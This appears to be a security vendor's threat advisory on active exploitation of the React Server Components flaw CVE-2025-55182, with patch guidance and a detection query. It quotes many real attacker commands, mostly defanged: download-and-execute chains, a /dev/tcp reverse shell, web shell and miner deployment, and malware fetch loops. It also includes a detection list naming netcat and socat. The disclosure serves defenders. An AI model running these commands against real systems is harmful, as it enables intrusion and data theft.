Exploitation of Critical Vulnerability in React Server Components (Updated December 12)

Executive Summary

Update Dec. 9, 2025

Unit 42 has identified activity that reportedly shares overlap with North Korean (DPRK) Contagious Interview tooling, though no formal attribution has occurred at this time. Contagious Interview is a campaign where threat actors associated with the DPRK pose as recruiters to install malware on the devices of job seekers in the tech industry.

The observed activity includes EtherRAT. The DPRK threat actor UNC5342 is reportedly utilizing the EtherHiding technique for malware delivery and cryptocurrency theft. EtherHiding leverages blockchain technology to store and retrieve malicious payloads.

Additionally, we’ve observed instances of the Linux backdoor BPFDoor. This is a Linux implant attributed to Chinese-linked threat actor Red Menshen.

Lastly, Unit 42 has detected multiple instances of a previously undocumented Auto-color backdoor. Auto-color masquerades as a legitimate Pluggable Authentication Module (PAM) library (pamssod).

Further details are in the Scope of Post-Exploitation Activity section.

Update Dec. 8, 2025

Unit 42 has observed post-exploitation activity following the exploitation of CVE-2025-55182 indicating multiple vectors of attack. This attack included initial reconnaissance that involved automated scanning for the remote code execution (RCE) vulnerability as well as Base64-encoded commands to:

• Rapidly fingerprint compromised systems
• Verify privilege levels
• Map network interfaces
• Enumerate sensitive credentials and DNS configurations
• Retrieve malicious binaries from attacker-controlled C2

Attackers proceeded with installation activities, leveraging wget and curl to download and execute malicious scripts, including sex.sh and a Linux dropper (x86_64) designed for persistent infection. In one instance, we identified a bash reverse shell connected to a probable Cobalt Strike server.

Additionally, we observed activity consistent with an activity cluster we track as CL-STA-1015, an initial access broker (IAB) with suspected ties to the PRC’s Ministry of State Security. This activity involved the fileless execution of a malicious shell script (slt) via curl or wget, followed by the installation of SNOWLIGHT and VShell Trojans.

Further details are in the Scope of Post-Exploitation Activity section.

On Dec. 3, 2025, researchers publicly disclosed critical remote code execution (RCE) vulnerabilities in the Flight protocol used by React Server Components (RSC).

Originally, the flaw was tracked as two vulnerabilities, CVE-2025-55182 (React) and CVE-2025-66478 (Next.js). Both were assigned a maximum severity rating of CVSS 10.0.

CVE-2025-66478 has since been rejected as a duplicate of CVE-2025-55182.

The flaw allows unauthenticated attackers to execute arbitrary code on the server via insecure deserialization of malicious HTTP requests. Testing indicates the exploit has near-100% reliability and requires no code changes to be effective against default configurations. While there were no reports of exploitation in the wild as of Dec. 3, 2025, Unit 42 has since observed post-exploitation activity, as detailed in our updates.

React is heavily implemented in enterprise environments, used by roughly 40% of all developers, while Next.js is used by approximately 18%-20%. This makes it the leading server-side framework for the React ecosystem.

Palo Alto Networks Cortex Xpanse has identified the presence of over 968,000 React and Next.js instances in our telemetry.

CVE-2025-55182 impacts the React 19 ecosystem and frameworks that implement it. Specifically, it affects the following versions:

• React: Versions 19.0, 19.1, and 19.2
• Next.js: Versions 15.x and 16.x (App Router), as well as Canary builds starting from 14.3.0
• Other frameworks: Any library bundling the react-server implementation, including React Router, Waku, RedwoodSDK, Parcel and Vite RSC plugins

Palo Alto Networks customers receive protections from and mitigations for CVE-2025-55182 in the following ways:

• Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach
• Cortex Xpanse is designed to identify exposed devices and applications on the public internet and escalate these findings to defenders
• Cortex Cloud and Prisma Cloud both have detection capabilities for cloud resources exposed to the vulnerability discussed in this brief

Palo Alto Networks also recommends upgrading to the following hardened versions immediately:

• React: Upgrade to 19.0.1, 19.1.2, or 19.2.1
• Next.js: Upgrade to the latest stable patched versions, including 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 or 15.0.5

The Unit 42 Incident Response team can be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Details of the Vulnerability: CVE-2025-55182 (React)

CVE-2025-55182 is classified as Critical (CVSS 10.0) and is caused by insecure deserialization within the RSC architecture, specifically involving the Flight protocol.

The vulnerability resides in the react-server package and its implementation of the RSC Flight protocol. It is a logical deserialization flaw where the server processes RSC payloads safely.

When a server receives a specially crafted, malformed HTTP payload (typically through data delivered in a POST request), it fails to correctly validate the structure of the data. Because of this insecure deserialization, the server allows attacker-controlled data to influence server-side execution logic.

This results in RCE, allowing an attacker to execute arbitrary privileged JavaScript code on the server.

Attack Vector and Exploitability

• Attack complexity: The attack complexity is low. It requires no user interaction and no privileges (unauthenticated).
• Target endpoints: The attack targets React Server Function endpoints.
  • Critical nuance: Even if an application does not strictly implement or use React Server Functions, it remains vulnerable if the application supports React Server Components generally.
• Reliability: Testing has shown the exploit has near-100% reliability.
• Default configuration: The vulnerability is present in default configurations. For example, a standard Next.js application created with create-next-app and built for production is exploitable without any code changes by the developer.

Specific Affected Components

While generally described as affecting React and Next.js, the vulnerability technically exists within specific underlying packages that handle server-side rendering and module loading.

Affected Packages

The vulnerability is present in versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0 of the following packages:

• react-server-dom-webpack
• react-server-dom-parcel
• react-server-dom-turbopack

Affected Framework Implementations

Any framework bundling these packages is affected:

• Next.js: Versions 15.x and 16.x (App Router), as well as Canary builds starting from 14.3.0-canary.77
• Other ecosystems: React Router, Waku, RedwoodSDK, Parcel and the Vite RSC plugin are all affected if they use the vulnerable React packages

Scope of Post-Exploitation Activity

Unit 42 has observed interactive sessions related to the exploitation of CVE-2025-55182, including:

• Scanning for servers vulnerable to RCE
• Reconnaissance
• Attempted theft of cloud credential configuration and credential files
• Installation of downloaders to retrieve payloads from attacker command and control (C2) infrastructure
• Attempting to install Cobalt Strike
• Malicious dropper scripts
• Cryptomining software
• Interactive web shells masquerading as a React File Manager
• Executing EtherRAT
• Executing and installing Noodle RAT
• IAB activity
• Executing SNOWLIGHT and VShell findings

Scanning

We are observing automated scanning for the RCE vulnerability:

/bin/sh -c echo $((288*288))

/bin/sh -c echo $((40453*43186))
/bin/sh -c powershell -c \288*288\

/bin/sh -c $(curl -s http://help.093214[.]xyz:9731/fn32.sh | bash | gzip -n | base64 -w0),/bin/sh -c echo VULN_CHECK_SUCCESS

/bin/sh –c echo $((288*288))

 

/bin/sh –c echo $((40453*43186))

/bin/sh –c powershell –c \288*288\

 

/bin/sh –c $(curl –s http://help.093214[.]xyz:9731/fn32.sh | bash | gzip -n | base64 -w0),/bin/sh -c echo VULN_CHECK_SUCCESS

Attacker reconnaissance has been observed in the form of passing Base64-encoded commands for gathering immediate situational awareness after compromising a system. Attackers rapidly fingerprint the operating system and architecture (uname), verify their current privilege level (id) and map network interfaces (hostname).

The sequence concludes by enumerating the file system for sensitive credentials and analyzing DNS configurations (resolv.conf) to identify cloud environments or internal targets for lateral movement.

The format for running reconnaissance commands is:

/bin/sh -c echo | base64 -d | sh | base64 -w0

/bin/sh –c echo base64–encoded text> | base64 –d | sh | base64 –w0

The decoded Base64 command runs the following reconnaissance commands:

/bin/sh uname -a ; id ;hostname -I ; ls -la / ; ls -la ~ ;cat /etc/hosts;cat /etc/resolv.conf

/bin/sh uname –a ; id ;hostname –I ; ls –la / ; ls –la ~ ;cat /etc/hosts;cat /etc/resolv.conf

Commodity Malware Installation Activity

Unit 42 has observed multiple clusters of activity related to the deployment of cryptomining software, as well as other commodity malware loaders.

In one instance, attackers passed a download-and-execute attack sequence using wget to retrieve a malicious script (named sex.sh) from an attacker-controlled C2 server. The attacker employed the && operator to create a conditional chain, ensuring that the malicious script is passed to the bash interpreter for immediate execution only after it has been successfully downloaded to disk.

In another, an automated script was used to ​​perform data theft, verification, and install multiple malware downloaders consistent with internet-of-things (IoT) activity such as a Mirai botnet.

The defanged commands are:

/bin/sh -c wget hxxp[:]//46.36.37[.]85:12000/sex.sh && bash sex.sh

/bin/sh -c $(curl -s http://keep.camdvr[.]org:8000/d5.sh | bash | gzip -n | base64 -w0),/bin/sh -c echo $((41*271)),/bin/sh -c echo $((42259*42449)),/bin/sh -c wget http://superminecraft.net[.]br:3000/sex.sh && bash sex.sh,/bin/sh -c wget https://sup001.oss-cn-hongkong.aliyuncs[.]com/123/python1.sh && chmod 777 python1.sh && ./python1.sh

45.134.174[.]235/2.sh

45.134.174[.]235/solra

45.134.174.235/?h=45.134.174.235&p=80&t=tcp&a=l64&stage=true

Decoded and Defanged command:

/bin/sh -c (wget -qO- http://156.234.209[.]103:20912/get.sh || curl -fsSL http://156.234.209[.]103:20912/get.sh) | bash,/bin/sh -c curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner .sh | bash -s ,/bin/sh -c echo $((41*271)),/bin/sh -c echo $((42636*43926)),/bin/sh -c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString(‘http://156.234.209[.]103:63938/nrCrQ’)

Decoded and Defanged command:

/bin/sh -c echo wget -O /tmp/test.sh http://31.57.46.28/test.sh&&sh /tmp/test.sh|base64 -d|sh,/bin/sh -c id && pwd && ls -la && ps aux | grep node

(command -v curl >/dev/null 2>&1 && curl -s hxxp://47.84.57[.]207/index | bash) || (command -v wget >/dev/null 2>&1 && wget -q -O- hxxp://47.84.57[.]207/index | bash) || (command -v python3 >/dev/null 2>&1 && python3 -c “import urllib.request as u,subprocess; subprocess.Popen([‘bash’], stdin=subprocess.PIPE).communicate(u.urlopen(‘hxxp://47.84.57.207/index’).read())”) || (command -v python >/dev/null 2>&1 && python -c “import urllib2 as u,subprocess; subprocess.Popen([‘bash’], stdin=subprocess.PIPE).communicate(u.urlopen(‘hxxp://47.84.57[.]207/index’).read())”)

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

/bin/sh –c wget hxxp[:]//46.36.37[.]85:12000/sex.sh && bash sex.sh

 

/bin/sh –c $(curl –s http://keep.camdvr[.]org:8000/d5.sh | bash | gzip -n | base64 -w0),/bin/sh -c echo $((41*271)),/bin/sh -c echo $((42259*42449)),/bin/sh -c wget http://superminecraft.net[.]br:3000/sex.sh && bash sex.sh,/bin/sh -c wget https://sup001.oss-cn-hongkong.aliyuncs[.]com/123/python1.sh && chmod 777 python1.sh && ./python1.sh

 

45.134.174[.]235/2.sh

 

45.134.174[.]235/solra

 

45.134.174.235/?h=45.134.174.235&p=80&t=tcp&a=l64&stage=true

 

Decoded and Defanged command:

 

/bin/sh -c (wget -qO- http://156.234.209[.]103:20912/get.sh || curl -fsSL http://156.234.209[.]103:20912/get.sh) | bash,/bin/sh -c curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner .sh | bash -s ,/bin/sh -c echo $((41*271)),/bin/sh -c echo $((42636*43926)),/bin/sh -c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString(‘http://156.234.209[.]103:63938/nrCrQ’)

 

Decoded and Defanged command:

 

/bin/sh -c echo wget -O /tmp/test.sh http://31.57.46.28/test.sh&&sh /tmp/test.sh|base64 -d|sh,/bin/sh -c id && pwd && ls -la && ps aux | grep node

 

(command -v curl >/dev/null 2>&1 && curl -s hxxp://47.84.57[.]207/index | bash) || (command -v wget >/dev/null 2>&1 && wget -q -O- hxxp://47.84.57[.]207/index | bash) || (command -v python3 >/dev/null 2>&1 && python3 -c “import urllib.request as u,subprocess; subprocess.Popen([‘bash’], stdin=subprocess.PIPE).communicate(u.urlopen(‘hxxp://47.84.57.207/index’).read())“) || (command -v python >/dev/null 2>&1 && python -c “import urllib2 as u,subprocess; subprocess.Popen([‘bash’], stdin=subprocess.PIPE).communicate(u.urlopen(‘hxxp://47.84.57[.]207/index’).read())“)

Figure 1 shows the attack flow of the XMRIG deployment as seen in Cortex XDR.

Figure 1. Attack flow of XMRIG deployment.

Figure 2 is an alert notification in Cortex XDR for XMRig activity.

Figure 2. Cortex XDR alert for XMRig activity.

In one observation, the attacker installed a dropper designed to infect Linux systems. The dropper uses a redundant logic block to ensure the payload is delivered. It first attempts to curl the binary with flags to silence output and follow redirects, and falls back to wget if the first tool is missing or fails.

Upon successful download to the /tmp directory, the script executes a chain of commands to make the file universally executable. It then immediately launches the payload, establishing the infection without user intervention.

The defanged command for this is:

/bin/sh -c ((curl -sL hxxp[:]//45.32.158[.]54/5e51aff54626ef7f/x86_64 -o /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64) || (wget hxxp[:]//45.32.158[.]54/5e51aff54626ef7f/x86_64 -O /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64))

/bin/sh –c ((curl –sL hxxp[:]//45.32.158[.]54/5e51aff54626ef7f/x86_64 -o /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64) || (wget hxxp[:]//45.32.158[.]54/5e51aff54626ef7f/x86_64 -O /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64))

Cloud and Container Exploit Attempts

Unit 42 also observed React2Shell exploit attempts across major cloud platforms. These targeted cloud instances hosted containers, including Kubernetes, running applications vulnerable to CVE-2025-55182 via integrated React components.

The operations involved command-line execution of wget, curl, chmod and other utilities either directly or though through the BusyBox binary, resulting in attackers attempting to install Mirai loaders and other payloads.

Although attackers made attempts to install these files, their malicious downloads were blocked, preventing execution.

# Witnessed commands
## BusyBox
/bin/sh -c (cd /dev;busybox wget hxxp://31.56.27[.]76/n2/x86;chmod 777 x86;./x86 reactOnMynuts;busybox wget -q hxxp://193.34.213[.]150/nuts/bolts -O-|sh)

## Meshagent Directory String
wget -O /tmp/meshagent –no-check-certificate hxxps://72.62.67[.]33/meshagents?id=w%40Exooh1EQmSgfpvXk%24Kctk3F4RFhqP5EYgH2mHXjcZDuo3H61xfEs%24OKLnWsj6D&installflags=0&meshinstall=6

# Container Command Usage
runc –root /var/run/docker/runtime-runc/moby –log /run/containerd/io.containerd.runtime.v2.task/moby//log.json –log-format json create –bundle /run/containerd/io.containerd.runtime.v2.task/moby/ –pid-file /run/containerd/io.containerd.runtime.v2.task/moby//init.pid

# Witnessed commands

## BusyBox

/bin/sh –c (cd /dev;busybox wget hxxp://31.56.27[.]76/n2/x86;chmod 777 x86;./x86 reactOnMynuts;busybox wget -q hxxp://193.34.213[.]150/nuts/bolts -O-|sh)

 

## Meshagent Directory String

wget –O /tmp/meshagent —no–check–certificate hxxps://72.62.67[.]33/meshagents?id=w%40Exooh1EQmSgfpvXk%24Kctk3F4RFhqP5EYgH2mHXjcZDuo3H61xfEs%24OKLnWsj6D&installflags=0&meshinstall=6

 

# Container Command Usage

runc —root /var/run/docker/runtime–runc/moby —log /run/containerd/io.containerd.runtime.v2.task/moby/IMAGE_HASH>/log.json —log–format json create —bundle /run/containerd/io.containerd.runtime.v2.task/moby/IMAGE_HASH> —pid–file /run/containerd/io.containerd.runtime.v2.task/moby/IMAGE HASH>/init.pid IMAGE_HASH>

Cobalt Strike

Unit 42 observed a threat actor leveraging a bash reverse shell to connect to a probable Cobalt Strike server:

bash -c bash -i >& /dev/tcp/38.162.112[.]141/8899 0>&1

bash –c bash –i >& /dev/tcp/38.162.112[.]141/8899 0>&1

Additionally, Unit 42 observed a remote execution of a bash script named check.sh from 154.89.152[.]240. As shown in Figure 3, the script is responsible for downloading another binary from the same address named a_x64, which was saved under the name rsyslo.

The payload appears to be a Cobalt Strike agent that was created using CrossC2, an extension tool to create Cobalt Strike Beacon for Linux OS. Figure 3 shows the process in Cortex XDR.

Figure 3. Attack flow of Cobalt Strike deployment.

Figure 4 shows what the alert for Cobalt Strike activity looks like in Cortex XDR.

Figure 4. Cortex XDR alert for Cobalt Strike activity.

Web Shell Activity

We observed attackers installing an interactive web shell disguised as a React File Manager (fm.js) retrieved directly from GitHub. This web shell enables the browsing of directories to harvest sensitive configuration files, such as database passwords and API keys, while facilitating data exfiltration through a built-in download function to steal source code or customer data.

The tool supports persistent compromise by allowing the upload of additional backdoors or rootkits and grants the ability to inflict irreversible damage through bulk file deletion and direct system command execution.

The actor initiated the sequence by preemptively terminating existing node processes to eliminate port conflicts, followed by execution validation to confirm arbitrary code execution. The script stages a Node.js web shell payload in the /tmp directory. It employs heuristic network adaptation by iteratively modifying the configuration to cycle through various listening ports, attempting to circumvent local firewall policies.

The attack concludes by establishing ephemeral persistence via nohup and deploying unique verification artifacts (segawon.txt) to common web directories, enabling external validation of the compromise and mapping of the server’s file structure.

/bin/sh -c cd /tmp && nohup node fm.js > /dev/null 2>&1 & sleep 2,/bin/sh -c cd /tmp && sed -i ‘s/const PORT = [0-9]*/const PORT = 13373/’ fm.js 2>&1,/bin/sh -c cd /tmp && sed -i ‘s/const PORT = [0-9]*/const PORT = 3000/’ fm.js 2>&1,/bin/sh -c cd /tmp && sed -i ‘s/const PORT = [0-9]*/const PORT = 8080/’ fm.js 2>&1,/bin/sh -c cd /tmp && sed -i ‘s/const PORT = [0-9]*/const PORT = 8888/’ fm.js 2>&1,/bin/sh -c cd /tmp && sed -i ‘s/const PORT = [0-9]*/const PORT = 9000/’ fm.js 2>&1,/bin/sh -c cd /tmp && wget -q -O fm.js https://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/rjs/filemanager-standalone.js 2>&1 && wc -c fm.js,/bin/sh -c echo $((41*271)),/bin/sh -c echo ‘segawon.id’ > /app/public/segawon.txt && chmod 644 /app/public/segawon.txt,/bin/sh -c echo ‘segawon.id’ > /app/web/public/segawon.txt && chmod 644 /app/web/public/segawon.txt,/bin/sh -c echo ‘segawon.id’ > /var/www/html/segawon.txt && chmod 644 /var/www/html/segawon.txt,/bin/sh -c id,/bin/sh -c killall -9 node 2>/dev/null,/bin/sh -c ls -la

/bin/sh –c cd /tmp && nohup node fm.js > /dev/null 2>&1 & sleep 2,/bin/sh –c cd /tmp && sed –i ‘s/const PORT = [0-9]*/const PORT = 13373/’ fm.js 2>&1,/bin/sh –c cd /tmp && sed –i ‘s/const PORT = [0-9]*/const PORT = 3000/’ fm.js 2>&1,/bin/sh –c cd /tmp && sed –i ‘s/const PORT = [0-9]*/const PORT = 8080/’ fm.js 2>&1,/bin/sh –c cd /tmp && sed –i ‘s/const PORT = [0-9]*/const PORT = 8888/’ fm.js 2>&1,/bin/sh –c cd /tmp && sed –i ‘s/const PORT = [0-9]*/const PORT = 9000/’ fm.js 2>&1,/bin/sh –c cd /tmp && wget –q –O fm.js https://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/rjs/filemanager-standalone.js 2>&1 && wc -c fm.js,/bin/sh -c echo $((41*271)),/bin/sh -c echo ‘segawon.id’ > /app/public/segawon.txt && chmod 644 /app/public/segawon.txt,/bin/sh -c echo ‘segawon.id’ > /app/web/public/segawon.txt && chmod 644 /app/web/public/segawon.txt,/bin/sh -c echo ‘segawon.id’ > /var/www/html/segawon.txt && chmod 644 /var/www/html/segawon.txt,/bin/sh -c id,/bin/sh -c killall -9 node 2>/dev/null,/bin/sh -c ls -la

EtherRAT

Unit 42 has observed activity consistent with EtherRAT, which performs the following activities:

DPRK threat actor UNC5342 is reportedly using EtherHiding to deliver malware and facilitate cryptocurrency theft.

/bin/sh -c echo while :; do (curl -sL http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o ./s.sh 2>/dev/null || wget -qO ./s.sh http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2>/dev/null || python3 -c “import urllib.request as u;open(‘./s.sh’,’wb’).write(u.urlopen(‘http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh’).read())”) && [ -s ./s.sh ] && chmod +x ./s.sh && ./s.sh && break; sleep 300; done

/bin/sh –c echo while :; do (curl –sL http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o ./s.sh 2>/dev/null || wget -qO ./s.sh http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2>/dev/null || python3 -c “import urllib.request as u;open(‘./s.sh’,’wb’).write(u.urlopen(‘http://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh’).read())”) && [ -s ./s.sh ] && chmod +x ./s.sh && ./s.sh && break; sleep 300; done

Noodle RAT

Unit 42 observed the deployment of Noodle RAT, a backdoor confirmed to have both Windows and Linux versions and suspected to be used by Chinese-speaking groups engaged in either espionage or cybercrime.

hxxp://146.88.129[.]138:5511/443nb64

tcp://vip[.]kof97.lol:443

192.238.202[.]17

hxxp://146.88.129[.]138:5511/443nb64

 

tcp://vip[.]kof97.lol:443

 

192.238.202[.]17

Auto-Color

Unit 42 has observed multiple instances of a previously unseen Auto-color backdoor across multiple environments, malware we originally published about in February 2025. The filename associated with this backdoor, pamssod, masquerades as the legitimate Pluggable Authentication Module (PAM) library.

Auto-color was observed in the following times and locations:

• Early 2025 targeting Asian and North American universities and government organizations
• April 2025 on the network of a US-based chemicals company
• August 2025 in exploitation of CVE‑2025‑31324

CL-STA-1015 Activity

Unit 42 observed post-exploitation threat activity we assess with high confidence is consistent with an activity cluster we track as CL-STA-1015. This threat actor was assessed with medium confidence to be a Chinese state-sponsored Initial Access Broker according to Google TAG.

Attackers executed a command to retrieve and immediately execute a malicious shell script payload labeled slt from a remote C2 server. Consistent with previously seen activity, attackers employed a fail-safe logic using the OR operator:

• The system first attempts the download using curl with flags optimized for stealth (-fsSL to suppress output and follow redirects) and resilience (-m180 to prevent hanging).
• If curl is unavailable or fails, it automatically falls back to wget with similar quiet and timeout parameters.
• The command concludes by piping the downloaded content directly into sh, enabling fileless execution where the malicious script runs immediately in memory without necessarily writing a persistent file to the disk.

The defanged command for this is:

/bin/sh -c (curl -fsSL -m180 hxxp[:]//115.42.60[.]223:61236/slt||wget -T180 -q hsxp[:]//115.42.60[.]223:61236/slt)|sh

/bin/sh –c (curl –fsSL –m180 hxxp[:]//115.42.60[.]223:61236/slt||wget -T180 -q hsxp[:]//115.42.60[.]223:61236/slt)|sh

Following the above command, we observed the successful creation of two malicious files on the file system consistent with SNOWLIGHT and determined through analysis that the below VShell sample also resided on the same server:

SNOWLIGHT is a stealthy malware dropper seen in CL-STA-1015 activity. Its primary function is to infiltrate a compromised Linux system then download and execute additional, more powerful malware. Most notably, it downloads the VShell RAT. VShell is popular among Chinese-speaking cybercriminals in several forums, and its main developer is also a Chinese speaker.

KSwapDoor 

Upon further analysis, Unit 42 has discovered that what we previously identified as BPFDoor, is in fact a previously unseen Linux backdoor targeting servers that we are calling KSwapDoor. KSwapDoor implements a sophisticated P2P mesh network allowing multi-hop routing between infected nodes, uses AES-256-CFB encryption with Diffie-Hellman key exchange for C2 communications, and includes dormant passive packet sniffer code for potential firewall bypass. It provides full remote access capabilities including interactive shell, command execution, file operations, and lateral movement scanning. 

Key Findings:

• Stealth & Masquerade: Upon execution, the binary renames itself to [kswapd1], mimicking a legitimate Linux kernel swap daemon. It fully daemonizes by double-forking, creating a new session (setsid()), and redirecting all standard I/O to /dev/null.
• Obfuscation: Almost all critical strings and configuration data are protected using RC4 encryption. The malware decrypts these strings at runtime using key scheduling functions (sub_410A41 and sub_410B8D).
• Persistence & Configuration: It stores its configuration in an RC4-encrypted file within the user’s home directory. During initialization, it reads and decrypts this file to locate Command & Control targets.
• Resilience: The malware creates a watchdog loop that spawns and monitors child processes, automatically restarting them if they crash. It also utilizes a staging directory at /tmp/appInsight.

Interim Guidance

Required actions: Immediate patching is the only definitive mitigation.

Engineering and security teams should upgrade to the following hardened versions immediately:

• React: Upgrade to 19.0.1, 19.1.2, or 19.2.1
• Next.js: Upgrade to the latest stable patched versions, including 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 or 15.0.5

For the latest updates on this vulnerability, please see the documentation provided by the vendor:

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.

The following XQL query has been used to successfully identify post-compromise activity. During analysis, a low number of false positives were identified. We recommend reviewing the child processes spawned by the node process. Look for suspicious file operations, network operations, reconnaissance commands or code execution, such as the commands observed above.

// Description: This query attempts to identify possible node processes spawning two or more post-exploitation lolbins.

// Notes: This has the potential to capture false-positives, it is recommended to investigate the children processes spawned by the node process and check for suspicious file operations, network operations, reconnaissance commands or code execution.

config case_sensitive = false

| preset=xdr_process

| filter (actor_process_image_name in (“node”,”node.exe”, “bun”, “bun.exe”) and actor_process_command_line in (“*react-dom*”, “*.next*”, “*node_modules/next*”, “*react-server*”, “*next-server*”, “*node server.js*”, “*bin/next*”, “*–experimental-https*”, “*app/server*”, “*.pnpm/next*”, “*next start*”, “*next dev*”, “*react-scripts start*”, “*next/dist/server*”)) or (causality_actor_process_image_name in (“node”,”node.exe”, “bun”, “bun.exe”) and causality_actor_process_command_line in (“*react-dom*”, “*.next*”, “*node_modules/next*”, “*react-server*”, “*next-server*”, “*node server.js*”, “*bin/next*”, “*–experimental-https*”, “*app/server*”, “*.pnpm/next*”, “*next start*”, “*next dev*”, “*react-scripts start*”, “*next/dist/server*”))

| filter actor_process_command_line not in (“*homebrew*”, “*git config*”, “*/users*”, “*/usr*”, “*\users*”, “*gcloud config*”, “*git branch*”, “*git describe*”) and action_process_image_command_line not in (“*homebrew*”, “*git config*”, “*/users*”, “*/usr*”, “*\users*”, “*gcloud config*”, “*git branch*”, “*git describe*”) and causality_actor_process_command_line not in (“*Microsoft VS Code*”, “*iTerm2*”, “*Visual Studio Code*”) and action_process_image_name not in (“node”, “node.exe”)

| alter suspicious_processes = arraycreate(“id”, “curl”, “wget”, “whoami”, “arp”, “at.exe”, “hostname”, “nbstat.exe”, “netsh.exe”, “netstat.exe”, “nslookup”, “ping.exe”, “query.exe”, “systeminfo.exe”, “tasklist.exe”, “traceroute.exe”, “ipconfig.exe”, “whoami.exe”, “whois.exe”, “quser.exe”, “mshta.exe”, “jscript.exe”, “cscript.exe”, “wscript.exe”, “qwinsta.exe”, “nltest.exe”, “csvde.exe”, “wevtutil.exe”, “driverquery.exe”, “nbtscan.exe”, “ntdsutil.exe”, “vssadmin.exe”, “dsquery.exe”, “adfind.exe”, “klist.exe”, “vssvc.exe”, “nc”, “ncat”, “netcat”, “base64”, “uname”, “dmidecode”, “ip addr”, “chmod -x”, “chmod 7”, “socat”, “nohup”, “setsid”, “powershell.exe”, “cmd.exe”, “bash”, “sh”, “zsh”, “mkfifo”, “rundll32.exe”, “java”, “python”, “python.exe”, “php”, “ifconfig”, “net.exe”, “net1.exe”, “/dev/udp”, “/dev/tcp”, “adduser”, “useradd”, “lua”, “crontab”, “mknod”)

| alter matches = arrayfilter(suspicious_processes , action_process_image_command_line contains “@element”)

| comp count_distinct(action_process_image_command_line) as num_procs, values(action_process_image_command_line) as action_process_image_command_line, values(causality_actor_process_command_line) as causality_actor_process_command_line by agent_hostname, actor_process_image_name, actor_process_command_line, action_process_image_name

| filter num_procs > 1

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

// Description: This query attempts to identify possible node processes spawning two or more post-exploitation lolbins.

 

// Notes: This has the potential to capture false-positives, it is recommended to investigate the children processes spawned by the node process and check for suspicious file operations, network operations, reconnaissance commands or code execution.

 

config case_sensitive = false

 

| preset=xdr_process

 

| filter (actor_process_image_name in (“node”,“node.exe”, “bun”, “bun.exe”) and actor_process_command_line in (“*react-dom*”, “*.next*”, “*node_modules/next*”, “*react-server*”, “*next-server*”, “*node server.js*”, “*bin/next*”, “*–experimental-https*”, “*app/server*”, “*.pnpm/next*”, “*next start*”, “*next dev*”, “*react-scripts start*”, “*next/dist/server*”)) or (causality_actor_process_image_name in (“node”,“node.exe”, “bun”, “bun.exe”) and causality_actor_process_command_line in (“*react-dom*”, “*.next*”, “*node_modules/next*”, “*react-server*”, “*next-server*”, “*node server.js*”, “*bin/next*”, “*–experimental-https*”, “*app/server*”, “*.pnpm/next*”, “*next start*”, “*next dev*”, “*react-scripts start*”, “*next/dist/server*”))

 

| filter actor_process_command_line not in (“*homebrew*”, “*git config*”, “*/users*”, “*/usr*”, “*\users*”, “*gcloud config*”, “*git branch*”, “*git describe*”) and action_process_image_command_line not in (“*homebrew*”, “*git config*”, “*/users*”, “*/usr*”, “*\users*”, “*gcloud config*”, “*git branch*”, “*git describe*”) and causality_actor_process_command_line not in (“*Microsoft VS Code*”, “*iTerm2*”, “*Visual Studio Code*”) and action_process_image_name not in (“node”, “node.exe”)

 

| alter suspicious_processes = arraycreate(“id”, “curl”, “wget”, “whoami”, “arp”, “at.exe”, “hostname”, “nbstat.exe”, “netsh.exe”, “netstat.exe”, “nslookup”, “ping.exe”, “query.exe”, “systeminfo.exe”, “tasklist.exe”, “traceroute.exe”, “ipconfig.exe”, “whoami.exe”, “whois.exe”, “quser.exe”, “mshta.exe”, “jscript.exe”, “cscript.exe”, “wscript.exe”, “qwinsta.exe”, “nltest.exe”, “csvde.exe”, “wevtutil.exe”, “driverquery.exe”, “nbtscan.exe”, “ntdsutil.exe”, “vssadmin.exe”, “dsquery.exe”, “adfind.exe”, “klist.exe”, “vssvc.exe”, “nc”, “ncat”, “netcat”, “base64”, “uname”, “dmidecode”, “ip addr”, “chmod -x”, “chmod 7”, “socat”, “nohup”, “setsid”, “powershell.exe”, “cmd.exe”, “bash”, “sh”, “zsh”, “mkfifo”, “rundll32.exe”, “java”, “python”, “python.exe”, “php”, “ifconfig”, “net.exe”, “net1.exe”, “/dev/udp”, “/dev/tcp”, “adduser”, “useradd”, “lua”, “crontab”, “mknod”)

 

| alter matches = arrayfilter(suspicious_processes , action_process_image_command_line contains “@element”)

 

| comp count_distinct(action_process_image_command_line) as num_procs, values(action_process_image_command_line) as action_process_image_command_line, values(causality_actor_process_command_line) as causality_actor_process_command_line by agent_hostname, actor_process_image_name, actor_process_command_line, action_process_image_name

 

| filter num_procs > 1

Conclusion

The immediate and expansive exploitation of this vulnerability highlights the speed at which threat actors move to seize on opportunities. While we have noted China-nexus activity, the footprint of activity will encompass significant amounts of cybercriminal motivations as well.

Specifically of note, CL-STA-1015 (aka UNC5174) has a history of rapid exploitation of N-day vulnerabilities:

